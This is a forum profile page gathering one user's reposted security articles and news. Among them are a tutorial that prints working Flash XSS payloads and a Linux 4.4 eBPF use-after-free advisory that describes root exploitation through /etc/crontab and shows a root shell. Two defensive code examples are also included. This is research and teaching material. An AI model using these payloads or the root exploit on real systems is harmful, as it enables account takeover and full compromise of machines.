
Nytro

Administrators
  • Posts: 18752
  • Joined
  • Last visited
  • Days Won: 725

Everything posted by Nytro

  1. Interesting, I think... Useful? Possibly. I suspect it could be implemented in antivirus engines for heuristics.
  2. In short, for everyone: http://blog.erratasec.com/2016/06/etheriumdao-hack-similfied.html#.V2eZVLh96Uk
  3. Veit Hailperin, The Tale of a Fameless but Widespread Web Vulnerability Class - Security Fest 2016
     Published on 16 Jun 2016
     Veit Hailperin is a security researcher and consultant at scip AG. They are based in Zürich, Switzerland with clients covering a wide range, from non-profit organizations and governmental agencies to banks and insurance companies. His research interests are focused on network and application layer security.
     Title: The Tale of a Fameless but Widespread Web Vulnerability Class
     Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally, there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly widespread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.
      • 5
      • Upvote
  4. Well, a professional script should work even without JS. I don't think there's anything I can do about this.
  5. We don't have much time for the forum anymore, at least I don't... I don't see why someone can't register using Tor. Governments can't manage to stop Tor and we would?
  6. Try file:// to read from disk.
  7. Shit happens. Does anyone know how they managed it?
  8. Implementing an Obsolete VPN Protocol on Top of HTTP: Because Why Not?
     Posted by Niklaus Schiess
     Recently I've started some research on MikroTik's RouterOS, the operating system that ships with RouterBOARD devices. As I'm running such a device myself, one day I got curious about security vulnerabilities that have been reported on the operating system and the running services as it comes with tons of features. Searching for known vulnerabilities in RouterOS on Google doesn't really yield a lot of recent security related stuff. So I thought, there is either a lack of (public) research or maybe it is super secure... Not really satisfied with the outcome of my research about previous research, one day I thought I'd give it a shot and just take a quick look at the management interfaces, mainly the web interface. As it turns out, there could be a third explanation for the lack of security related search results on Google: obfuscation. The communication of the web interface is obfuscated, most likely encrypted, which may discourage researchers that just came around to search for low hanging fruits.
     RouterOS WebFig
     RouterOS is a proprietary operating system for routers, based on Linux. It is available for various architectures, including x86. It can be downloaded directly from the vendor's page and is usable for a couple of days without buying a license, which makes it really nice for researching. RouterOS provides different interfaces for device management:
       • Winbox is a native application for Windows
       • WebFig is a web interface
       • Access to a Cisco-like shell via SSH/Telnet
       • An API that is not enabled by default
     This blog post will cover the WebFig interface running on TCP port 80. By default there is no HTTPS interface available (which would lead to using untrusted certificates anyway). However, the release notes of RouterOS 5.5 state: "webfig - encrypt whole session even in non https mode;". Here it becomes quite interesting. The question is: how are they actually encrypting HTTP traffic without using SSL/TLS? I've fired up Burp and started to inspect the HTTP request of WebFig.
     Full article: https://www.insinuator.net/2016/05/implementing-an-obsolete-vpn-protocol-on-top-of-http-because-why-not/
      • 3
      • Upvote
  9. Sirin Labs launches ultra-secure, ultra-expensive Solarin smartphone
     It's the 'best' and 'most secure' phone ever made, its maker claims.
     By Charles McLellan for Product Central | May 31, 2016 -- 20:40 GMT (21:40 BST) | Topic: Smartphones
     Image: Sirin Labs' co-founders Kenes Rakishev, Moshe Hogeg and Tal Cohen launch the Solarin smartphone in London. Image: Charles McLellan/ZDNet
     If you're a startup launching into the hyper-competitive smartphone market, then -- as well as plenty of funding and nerves of steel -- you'll need to target a sector with room for yet another vendor. Sirin Labs, co-founded in 2013 by Kenes Rakishev (chairman), Moshe Hogeg (president) and Tal Cohen (CEO), is funded to the tune of $72 million (£49.6m) and launched its first product, Solarin -- which Hogeg confidently described as "the best phone ever made, and for sure the most secure phone ever made" -- in central London today. Solarin is also one of the most expensive smartphones ever made, starting at £9,500/$14,800 plus taxes.
     Image: Despite its price, the 5.5-inch Android-based Solarin is largely free of 'bling'-style decoration. Image: Sirin Labs
     Of course, expensive smartphones are available from the likes of Vertu, and secure ones from Silent Circle and others, so Sirin Labs isn't exactly entering virgin territory. But if you're a business leader, entrepreneur or financier with a lot of confidential information, a lot of communication needs, and the wherewithal to drop ten grand (sterling) on a phone, then Sirin Labs thinks you're a potential customer. Despite its price, Solarin isn't an over-decorated 'bling' phone. Indeed, this Swedish-designed-and-built Android (5.1) handset looks relatively restrained.
     It packs a decent, if not always cutting-edge, specification, including:
       • A 2GHz Qualcomm Snapdragon 810 octa-core SoC with 4GB of RAM and 128GB of internal storage;
       • A 5.5-inch Gorilla Glass 4-protected IPS LCD with 2,560 by 1,440 resolution (538ppi), delivering 120 percent of the sRGB colour gamut, 1,500:1 typical contrast ratio and 600cd/m2 typical brightness;
       • A 24-megapixel main camera with laser autofocus, quad-tone flash, optical image stabilisation and 4k video recording at 30fps, plus an 8-megapixel front camera with flash, electrical image stabilisation and HD video recording at 60fps;
       • An audio subsystem comprising three bass-boosted speakers and four microphones, plus a smart amplifier designed to maximise volume while minimising distortion;
       • Support for 24 LTE bands, 802.11ac wi-fi with 2x2 MU-MIMO and 60GHz WiGig; and
       • A 4,040mAh li-ion battery with claimed talk time of 31 hours (UMTS), standby time of 'over 2 weeks' and Qualcomm QuickCharge 2.0 support
     "Whenever you see something in our spec that isn't the latest, there's a very good reason for that," said CEO Tal Cohen at the launch, citing the 2k screen's combination of brightness, colour gamut and power consumption as an advantage over a 4k screen as an example.
     The Solarin measures 78mm wide by 159.8mm deep by 11.1mm thick, weighs 243g, is water/dust resistant to IP54 level and comes in Fibre Black Carbon Titanium, Fibre Black Carbon DLC, Fibre Black Carbon Yellow Gold and Crystal White Carbon DLC variants.
     Security
     Image: Solarin's Security Shield mode offers hardware-based, end-to-end encrypted VoIP calls and messages. Image: Charles McLellan/ZDNet
     Security is Sirin Labs' main focus, and its solution for the Solarin phone comprises three main elements:
       • Mobile threat protection from Zimperium, offering continuous protection against network, host-based and physical attacks;
       • Encrypted email powered by ProtonMail, which combines public-key cryptography with symmetric encryption protocols to offer end-to-end encryption via a 2-password system; and
       • Security Shield from KoolSpan, which enables hardware-based, end-to-end encrypted VoIP calls and messages using military-grade AES-256, FIPS 140-2 encryption.
     Security Shield mode is activated via a sliding Security Switch above the camera lens (diamond-inlaid, naturally), which also shuts down unnecessary operations on the phone.
     Is Sirin Labs' Solarin the best and most secure phone ever made, as co-founder and president Moshe Hogeg claims? Given the price, it'll need to be, and we look forward to investigating further in a full review in due course. If that ten grand is burning a hole in your pocket, the Solarin is available online now, at Sirin Labs' store in London's Mayfair (34 Bruton Place) from 1 June, and from Harrods in Knightsbridge from 30 June.
     Update, June 2 2016
     Vertu is the best-known name in the 'luxury technology' market, and ZDNet asked CEO Gordon Watson for his reactions to Sirin Labs' Solarin launch: "Vertu is always interested to see new entrants in the luxury technology space and we welcome competition to the market. While that category has had many players over the years, Vertu has often been a lone voice within it. However, while the luxury technology category is growing, competing within it is tough, particularly with high-end or luxury mobile phones. Vertu has been honing its business for 18 years and continues to innovate in order to keep pace with changes in both the technology and luxury industries," said Watson.
     On the Solarin phone's emphasis on security and design/build quality rather than overtly luxurious features, Watson had this to say: "At this stage we've not seen the product first hand, so it would be impossible to judge it fairly. Vertu's smartphone products have been the brand's best sellers over the last three years and these combine leading-edge technology, precision-engineered build and a suite of personalised and curated services -- the combination of these three elements are vital to Vertu and allow us to offer a unique proposition."
     "We also believe that e-commerce, a global retail network and strong after-sales care add significantly to the consumer experience. Security has been a fundamental of the Vertu brand since the launch of its Signature S model in 2002 and the company continues to work closely with in-house security experts as well as external partners -- not least Google -- to ensure that customers are fully protected."
     And on Vertu's roadmap: "Vertu switched investment partners in the last quarter of 2015, moving to a team with knowledge of both the technology industry and the evolving Asian luxury market. The benefits of this new investment and expertise will be seen with a series of product launches in the latter part of 2016 and beyond."
     Source: http://www.zdnet.com/article/sirin-labs-launches-ultra-secure-ultra-expensive-solarin-smartphone/
  10. 25 MAY 2016 on security
      Over the years I found a lot of cross-site scripting vulnerabilities in flash files (recognizable by the .swf extension). Finding cross-site scripting vulnerabilities in flash files is some sort of a hobby for me because it almost always succeeds. It's pretty obvious that the awareness of cross-site scripting vulnerabilities is even lower than that of PHP developers.
      To start, unfortunately you can't do "right mouse click, view-source" on a flash file, but fortunately there are a couple of tools that can do it for you. For example http://www.showmycode.com/. A large list of tools can be found here: http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html
      To demonstrate how I analyze a flash file I'm going to use the banner.swf file and the zeroclipboard.swf cross-site scripting as examples, of which the banner.swf is a commonly known mistake and the zeroclipboard.swf file is a known vulnerable flash file that was made public in 2012 on Github (https://github.com/zeroclipboard/zeroclipboard/issues/14).

      banner.swf
      This vulnerability is pretty basic. When the clicktag function in ActionScript allows unfiltered user input it can be used to inject javascript URLs, for example javascript:alert(1). The getUrl function is used a lot and is often poorly filtered or not filtered at all. An example of a vulnerable flash file decompiled via showmycode:

          on (release) {
              geturl (_root.clickTAG, "_self");
          }

      on (release) is a trigger that executes code when the mouse is pressed and _root.clickTAG stands for the clickTAG parameter, which is not escaped or anything and is therefore vulnerable to cross-site scripting attacks. The vulnerability could be reproduced by following these steps:
        1. Go to banner.swf?clickTAG=javascript:alert(1)
        2. Press on the page (anywhere in this case)

      zeroclipboard.swf
      Zeroclipboard is a library used to modify the user's clipboard, often used to provide a "copy to clipboard" functionality. This vulnerability is a bit more complex than the banner.swf. Huge companies like coindesk and Yahoo were vulnerable to this vulnerability, so for me it's pretty interesting to know where this issue originated from. To start our search we need a vulnerable zeroclipboard file. A mirror of the vulnerable version can be downloaded here: http://github.com/cure53/Flashbang/raw/master/flash-files/files/ZeroClipboard.swf
      I decompiled the source using showmycode:

          package {
              import flash.events.*;
              import flash.display.*;
              import flash.external.*;
              import flash.system.*;
              import flash.utils.*;

              public class ZeroClipboard extends Sprite {
                  private var button:Sprite;
                  private var id:String = "";
                  private var clipText:String = "";

                  public function ZeroClipboard(){
                      super();
                      stage.scaleMode = StageScaleMode.EXACT_FIT;
                      Security.allowDomain("*");
                      var flashvars:* = LoaderInfo(this.root.loaderInfo).parameters;
                      id = flashvars.id;
                      button = new Sprite();
                      button.buttonMode = true;
                      button.useHandCursor = true;
                      button.graphics.beginFill(0xCCFF00);
                      button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height));
                      button.alpha = 0;
                      addChild(button);
                      button.addEventListener(MouseEvent.CLICK, clickHandler);
                      button.addEventListener(MouseEvent.MOUSE_OVER, function (_arg1:Event){
                          ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOver", null);
                      });
                      button.addEventListener(MouseEvent.MOUSE_OUT, function (_arg1:Event){
                          ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseOut", null);
                      });
                      button.addEventListener(MouseEvent.MOUSE_DOWN, function (_arg1:Event){
                          ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseDown", null);
                      });
                      button.addEventListener(MouseEvent.MOUSE_UP, function (_arg1:Event){
                          ExternalInterface.call("ZeroClipboard.dispatch", id, "mouseUp", null);
                      });
                      ExternalInterface.addCallback("setHandCursor", setHandCursor);
                      ExternalInterface.addCallback("setText", setText);
                      ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);
                  }
                  public function setHandCursor(_arg1:Boolean){
                      button.useHandCursor = _arg1;
                  }
                  private function clickHandler(_arg1:Event):void{
                      System.setClipboard(clipText);
                      ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText);
                  }
                  public function setText(_arg1){
                      clipText = _arg1;
                  }
              }
          }//package

      The function we are searching for is ExternalInterface.call. This function is used to call JavaScript functions from flash files and it's unreliable. When unfiltered input is passed to this function it's possible to inject your own JavaScript. A quick search for ExternalInterface.call returned:

          ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText);

      What we have to do now is find out how this function gets triggered. The example I used sits within a function called clickHandler so I did a quick search for clickHandler and found that it gets triggered when there is a click on an element named "button". What is button? Well, button = new Sprite(); which is a class used for user interface components. Let's take a look at the part where the sprite is created:

          button = new Sprite();
          button.buttonMode = true;
          button.useHandCursor = true;
          button.graphics.beginFill(0xCCFF00);
          button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height));
          button.alpha = 0;
          addChild(button);

      By looking at this part you might already have noticed the 5th line.

          button.graphics.drawRect(0, 0, Math.floor(flashvars.width), Math.floor(flashvars.height));

      This part determines the width and height of the button sprite by using two variables: flashvars.width and flashvars.height. To find out where these parameters are set we don't have to look very far. By searching for flashvars it's pretty easy to find out that flashvars stands for LoaderInfo(this.root.loaderInfo).parameters; which is used to get the parameters from a request. So, to set the width and height of the button element we have to add two parameters to the zeroclipboard.swf file in the url. Now, when the mouse is hovered over the button the function clickHandler will be called which triggers the vulnerable part of code that we want to reach.

          /zeroclipboard.swf?width=1000&height=1000

      Now we have to exploit the vulnerable part of code, let's get back to the vulnerable line:

          ExternalInterface.call("ZeroClipboard.dispatch", id, "complete", clipText);

      The id variable actually is user input, you can see that by searching for the id variable. In the code you will find id = flashvars.id; So, now we know that the variable id can be set by requesting the flash file with the parameter id (I almost could have guessed it..). To turn this into a cross-site scripting we first have to know how ActionScript generates the JavaScript code for the ExternalInterface.call. The code looks like this:

          try { __flash__toXML(ZeroClipboard.dispatch("USER INPUT HERE","load",null)) ; } catch (e) { "<undefined/>"; }

      User input is located at "USER INPUT HERE" so that is where we should try to break out. First we need to get out of the double quotes. We can't just do this by typing " because ActionScript does escape this input. Luckily it can be escaped by adding a backslash in front of it. So our payload needs to start with \". This will turn the generated JavaScript into:

          try { __flash__toXML(ZeroClipboard.dispatch("\\"","load",null)) ; } catch (e) { "<undefined/>"; }

      All we have to do now is inject our own script and make sure that it's valid JavaScript. First, let's add two forward slashes at the end of our payload. By adding two forward slashes at the end of our payload JavaScript will see everything behind it as a comment:

          try { __flash__toXML(ZeroClipboard.dispatch("\\"//","load",null)) ; } catch (e) { "<undefined/>"; }

      Because we chopped off the end of the function it now looks like this:

          try { __flash__toXML(ZeroClipboard.dispatch("\\"

      This is invalid JavaScript but we can fix that! Let's start by ending the two functions ZeroClipboard.dispatch and __flash__toXML. Our payload now looks like this: \"))// and the generated JavaScript looks like this:

          try { __flash__toXML(ZeroClipboard.dispatch("\\"))

      Now we have to end the try statement, we do this by using } catch(e) {}. Our payload now looks like this: \"))} catch(e) {}// and the generated JavaScript looks like this:

          try { __flash__toXML(ZeroClipboard.dispatch("\\"))} catch(e) {}

      This is perfectly valid JavaScript, all we have to do now is inject our payload. We can add the payload (for example, an alert) in the catch statement like this: \"))} catch(e) {alert(1);}// which makes the final url:

          /zeroclipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000

      List of known vulnerable flash files
      I started a public spreadsheet where everybody can contribute to make a list of vulnerable SWF files. You can contribute to the list here: https://docs.google.com/spreadsheets/d/1zWc4Sf0pk_6lDVG0Lm-SjFbVVR8hY5X9WoKJNPhGWCs

      Flashbang
      An awesome tool that can help you to find vulnerabilities in flash files is flashbang. It can be found here: https://cure53.de/flashbang. It's created by cure53 (obviously) and it's even open source on Github, available here: https://github.com/cure53/Flashbang

      Resources
      http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/
      https://github.com/DBA/swf_file
      https://github.com/cure53/Flashbang
      https://github.com/zeroclipboard/zeroclipboard/issues/14
      http://bruce-lab.blogspot.nl/2010/08/freeswfdecompilers.html

      smiegles
      Source: https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/
      • 3
      • Upvote
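The post above shows why the `id` parameter breaks out of the generated `try { __flash__toXML(ZeroClipboard.dispatch("...")) ... }` string: the quote is escaped, but a backslash placed in front of it is passed through. The following is an added example, not code from the blog post or from the ZeroClipboard project; it models that weak quote-only escaping (an assumption about the behaviour the post describes), puts a correctly escaped variant and an allowlist check beside it, and verifies each with a pure parse check on the resulting literal. The function names, the sample id and the breakout string used as input are constructed for the example; the breakout string is the one the post prints.

```javascript
// Added example: how a value lands inside the JavaScript that
// ExternalInterface.call generates, and why escaping only '"' is not enough.

// Template copied from the post: the id is dropped between the double quotes.
function buildDispatchCall(escaper, id, event) {
  return 'try { __flash__toXML(ZeroClipboard.dispatch("' + escaper(id) +
         '","' + event + '",null)) ; } catch (e) { "<undefined/>"; }';
}

// Assumed model of the weak behaviour described in the post: every '"'
// becomes '\"', but a backslash already present in the input is kept as-is,
// so the input '\"' turns into '\\"' and the backslash now escapes itself.
function escapeNaive(s) {
  return s.replace(/"/g, '\\"');
}

// Hardened variant: JSON.stringify emits a complete JavaScript string literal
// with backslashes, quotes and control characters escaped; the surrounding
// quotes are stripped because the template supplies its own.
function escapeSafe(s) {
  return JSON.stringify(s).slice(1, -1);
}

// Check: does the escaped text survive as ONE string literal whose value is
// the original input? The Function constructor only parses and returns the
// literal; a breakout shows up as a SyntaxError at parse time.
function literalRoundTrips(escaper, s) {
  try {
    const value = new Function('return "' + escaper(s) + '";')();
    return value === s;
  } catch (e) {
    return false; // the input closed the literal early
  }
}

// Second layer a widget like this should have: an element id has no business
// containing quotes, backslashes, braces or parentheses, so reject them
// before the value ever reaches the template.
function isValidElementId(id) {
  return typeof id === 'string' && /^[A-Za-z0-9_-]{1,64}$/.test(id);
}

// Constructed sample inputs: an ordinary element id, and the breakout string
// from the post (written as a JS literal, so '\\' is one backslash).
const SAMPLE_ID = 'd_clip_button';
const BREAKOUT = '\\"))} catch(e) {alert(1);}//';

// Stand-alone demonstration.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildDispatchCall(escapeNaive, BREAKOUT, 'load'));
  console.log('naive round-trips breakout:', literalRoundTrips(escapeNaive, BREAKOUT)); // false
  console.log('safe round-trips breakout: ', literalRoundTrips(escapeSafe, BREAKOUT));  // true
  console.log('breakout passes allowlist: ', isValidElementId(BREAKOUT));               // false
}
```

Run with `node` to see the generated string for the breakout input: under `escapeNaive` the literal ends right after `"\\"`, so the rest of the input is parsed as code, exactly as the post walks through; under `escapeSafe` the same input stays a single string and is handed to `ZeroClipboard.dispatch` unchanged. Allowlisting the id is the cheaper fix, but escaping correctly at the template is what closes the class.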
  11. It's good promotion for our country. It's the story of someone who works and who is recognized by many companies. Of course, he's not the only one doing this kind of thing and doing it well, but he is one of them.
  12. It's freelancing. It's passion. It's a way of life.
  13. The Romanian Teen Hacker Who Hunts Bugs to Resist the Dark Side
      IT'S 3 AM, and his eyes are almost closed. The pack of gummy bears on his desk is empty. So's the Chinese takeout box. Romanian white hat hacker Alex Coltuneac has had three hours of sleep tonight. And last night. And the night before that. He's busy trying to find a vulnerability in YouTube live chat, which he plans to report to the company and hopefully get some money in return. None of the bugs he has discovered in the past few days electrifies him, so he keeps digging.
      In the past four years, Coltuneac has gotten bug bounty payments from Google, Facebook, Microsoft, Adobe, Yahoo, eBay, and PayPal for flaws he reported. Such bounty programs are a chance for Eastern European hackers like him to pursue a legitimate career in cybersecurity. And he's only 19 years old. In a country better known for cybercrime, the teenager is part of a small but growing cohort of hackers who are deciding to play it nice. This is a departure for the hacking community of Romania, known for such hits as the hackers Hackerville and Guccifer, and fraudsters who steal money from American bank accounts, perpetrate eBay frauds, and land themselves on the FBI's most wanted list.
      Coltuneac is a freshman at the Babes-Bolyai University in Cluj-Napoca, where he learns Computer Science taught in English. Raised by a family who emphasized honest values, he started using a computer when he was 6. First, he taught himself how to play games, but as he got older he began to see the computer's potential as a tool to make money. He spent his early teenage years watching fellow Romanian hackers make astounding sums of money selling exploits on the black market. They were able to rake in thousands of US dollars with just a few clicks, far more than Coltuneac's parents made in a month. He was a good kid, from a good family. He didn't want to join them. But he did want to pay for college. The allure of that life was powerful.
      Which is why he was so grateful to find out about bug bounty programs when he was 15. They pay enough to keep his conscience clear and his bank account full. Bounties cover the cost of his education and living expenses, so "there's no excuse to break the law," he said. Coltuneac won't say how much he earns as a vulnerability hunter, yet gifted white hat hackers doing the same kind of job brag about making in a lucky month about $6,000. That's how much an ordinary Romanian earns in a year. The average take home pay in the country was about $520 a month this March, one of the lowest in the European Union.
      On the white market, a flaw found and reported legitimately is priced at a few hundred dollars, enough for Coltuneac to pay his rent this month. Sensitive ones are often rewarded with several thousand dollars. In very few cases, the bounty exceeds $100,000. He's constantly hoping to find one of those. And that sum is still far less than what he would get if he sold the same vulnerabilities on the gray or black markets. (Gray markets sell exploits to nations and corporations to use against their foes; black markets sell to the highest bidder, often criminals.) Zerodium, a gray hat vulnerability broker working with law enforcement and intelligence agencies, awards a hacker up to $500,000 for a high-risk bug with a fully functional exploit.
      Patching Giants
      Coltuneac started hunting vulnerabilities when he was 15, after visiting a Romanian cybersecurity forum, in his free time after school. Like most Romanian hackers, the teen is self taught. Soon, he got his first few hundred dollars from Google, and used them to buy himself a brand new computer. His desktop was dead slow. "I got lucky. I found a sensitive file. I used brute force," he said. The tech giant is among the companies he closely monitors for bug bounty programs. He has recently found an LFI vulnerability and several XSS flaws in Google FeedBurner.
      Last year alone, Google awarded over $2 million to security researchers globally, and since 2010, when it began its bug bounty program, it has paid a total of $6 million. For 2015, Google highlighted Romania as among the top countries bug bounties were paid out to. Coltuneac has also made it to Microsoft's Bounty Hunters: The Honor Roll. This spring he found an XSS vuln in their OAuth interface. Microsoft is constantly improving its bounty program, and last year, the company included rewards for flaws found in Azure, ASP.NET, .NET Core runtime and the Edge browser.
      Full article: https://www.wired.com/2016/05/romanian-teen-hacker-hunts-bugs-resist-dark-side/
  14. Jobs available at the start of summer:
      SecureWorks jobs: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4894363
        • Penetration Tester - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/penetration-tester-87625
        • Technical Testing Tools Developer - Ruby on Rails & JavaScript - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-testing-tools-developer-ruby-javascript-88418
        • Vulnerability Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444
        • Solutions Architect Consultant - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/solutions-architect-consultant-secureworks-bucharest-89440
        • Linux System Administrator - SecureWorks: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/linux-system-administrator-secureworks-89426
        • Junior Linux Administrator - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-administrator-secureworks-bucharest-89427
        • Information Security Specialist - Rotating Shifts - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-senior-analyst-rotating-shifts-86359
        • Local IT Support - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137
        • Network Engineering Specialist - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077
        • Network Engineer - Telecom - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891
        • Information Security Risk Management Advisor - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-secureworks-bucharest-89300
        • SharePoint Designer - SecureWorks - Bucharest: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/sharepoint-designer-secureworks-bucharest-89716
      Dell jobs:
        • Technical Support Agent - English: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-agent-english-86798
        • Critical Incident Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/critical-incident-consultant-88525
        • Windows System Administrator: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-86347
        • Information Security Team Leader: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-team-leader-86413
        • Network Security Engineer - Firewall: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-engineer-firewall-87655
        • Senior IT Manager: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-it-manager-86956
        • Vulnerability Consultant: http://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-consultant-88299
      If you have questions, send me a PM.
  15. Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free Local Root Exploit
      In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. These conditions are fulfilled in Ubuntu 16.04.
      When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up pointers for the corresponding map files. This is done as follows:

          /* look for pseudo eBPF instructions that access map FDs and
           * replace them with actual map pointers */
          static int replace_map_fd_with_map_ptr(struct verifier_env *env)
          {
              struct bpf_insn *insn = env->prog->insnsi;
              int insn_cnt = env->prog->len;
              int i, j;

              for (i = 0; i < insn_cnt; i++, insn++) {
                  [checks for bad instructions]
                  if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                      struct bpf_map *map;
                      struct fd f;
                      [checks for bad instructions]
                      f = fdget(insn->imm);
                      map = __bpf_map_get(f);
                      if (IS_ERR(map)) {
                          verbose("fd %d is not pointing to valid bpf_map\n", insn->imm);
                          fdput(f);
                          return PTR_ERR(map);
                      }
                      [...]
                  }
              }
              [...]
          }

      __bpf_map_get contains the following code:

          /* if error is returned, fd is released.
           * On success caller should complete fd access with matching fdput() */
          struct bpf_map *__bpf_map_get(struct fd f)
          {
              if (!f.file)
                  return ERR_PTR(-EBADF);
              if (f.file->f_op != &bpf_map_fops) {
                  fdput(f);
                  return ERR_PTR(-EINVAL);
              }
              return f.file->private_data;
          }

      The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If __fget_light() detected that the file descriptor table is shared with another task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause the reference count of the struct file to be over-decremented, allowing an attacker to create a use-after-free situation where a struct file is freed although there are still references to it.
      A simple proof of concept that causes oopses/crashes on a kernel compiled with memory debugging options is attached as crasher.tar.
      One way to exploit this issue is to create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file's writability, then free the writable file and open a readonly file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to write data to a readonly file. By e.g. writing to /etc/crontab, root privileges can then be obtained. There are two problems with this approach:
        1. The attacker should ideally be able to determine whether a newly allocated struct file is located at the same address as the previously freed one. Linux provides a syscall that performs exactly this comparison for the caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).
        2. In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.) writev() calls do_writev(), which looks up the struct file * corresponding to the file descriptor number and then calls vfs_writev(). vfs_writev() verifies that the target file is writable, then calls do_readv_writev(), which first copies the struct iovec from userspace using import_iovec(), then performs the rest of the write operation. Because import_iovec() performs a userspace memory access, it may have to wait for pages to be faulted in - and in this case, it has to wait for the attacker-owned FUSE filesystem to resolve the pagefault, allowing the attacker to suspend code execution in the kernel at that point arbitrarily.
      An exploit that puts all this together is in exploit.tar. Usage:

          user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
          user@host:~/ebpf_mapfd_doubleput$ ./doubleput
          starting writev
          woohoo, got pointer reuse
          writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
          suid file detected, launching rootshell...
          we have root privs now...
          root@host:~/ebpf_mapfd_doubleput# id
          uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

      This exploit was tested on an Ubuntu 16.04 Desktop system.
      Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
      Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
      Source: https://cxsecurity.com/issue/WLB-2016050014
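As an added example, not from the post above nor from the kernel source, here is a user-space model of the ownership mistake the post describes: a callee whose contract is "if error is returned, fd is released" paired with a caller that releases the fd again on the error path. The struct file, struct fd, fdget()/fdput() and bpf_map_get() below are constructed stand-ins that only track a reference count, so the over-decrement is visible as a refcount that drops to zero while the file descriptor table still holds the file.

```c
#include <errno.h>
/* Added example, not from the post or the kernel: a user-space model of the
 * double fdput() described above. Names mirror kernel ones, but every struct
 * and function here is constructed for illustration. */
#define FDPUT_FPUT 1  /* "holder owes one put": set when the fd table is shared */

struct file { int refcount; int is_bpf_map; };
struct fd   { struct file *file; unsigned flags; };

/* Model of fdget(): a shared fd table means a real reference is taken and
 * FDPUT_FPUT is set; otherwise the file is borrowed and nothing is owed. */
static struct fd fdget(struct file *f, int table_shared)
{
	struct fd r = { f, 0 };
	if (table_shared) { f->refcount++; r.flags = FDPUT_FPUT; }
	return r;
}

/* Model of fdput(): drops a reference only if one is actually owed. */
static void fdput(struct fd f) { if (f.file && (f.flags & FDPUT_FPUT)) f.file->refcount--; }

/* Model of __bpf_map_get(): per its comment "if error is returned, fd is
 * released", so on the error path ownership passes to the callee. */
static long bpf_map_get(struct fd f)
{
	if (!f.file)
		return -EBADF;
	if (!f.file->is_bpf_map) { fdput(f); return -EINVAL; }
	return 0;
}

/* Caller as in the vulnerable replace_map_fd_with_map_ptr(): puts the fd
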